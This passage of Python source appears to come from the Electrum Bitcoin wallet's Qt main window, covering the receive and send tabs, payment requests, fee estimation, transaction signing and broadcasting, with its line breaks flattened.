self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = {} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(140) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(140) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(140) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(20) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() return outputs, fee_estimator, label, coins def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() use_rbf = self.config.get('use_rbf', True) if use_rbf: tx.set_rbf(True) if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_byte()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = 